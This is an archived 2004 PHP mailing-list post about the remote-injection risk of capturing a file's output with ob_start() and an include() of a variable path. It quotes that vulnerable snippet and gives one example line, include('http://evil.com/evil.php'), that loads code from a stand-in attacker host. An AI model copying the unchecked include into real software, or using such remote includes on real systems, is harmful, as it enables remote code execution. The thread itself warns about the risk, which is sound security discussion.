[nycphp-talk] parse file, return as string
David Mintz
dmintz at davidmintz.org
Thu Aug 19 12:07:05 EDT 2004
On Thu, 19 Aug 2004, inforequest wrote:
> Fan, Wellington wfan-at-VillageVoice.com |nyphp 04/2004| wrote:
>
> >ob_start();
> >@include($path_to_file);
> >$contents = ob_get_clean();
> >
> >
> be very wary of remote injections with that code.... include will accept
> a URL in that variable. Explicitly allow $path_to_file (is it expected
> to allways be on *your* domain?).
>
If you have allow_url_fopen disabled, include('http://evil.com/evil.php')
will fail, right?
---
David Mintz
http://davidmintz.org/
"Anybody else got a problem with Webistics?" -- Sopranos 24:17
More information about the talk
mailing list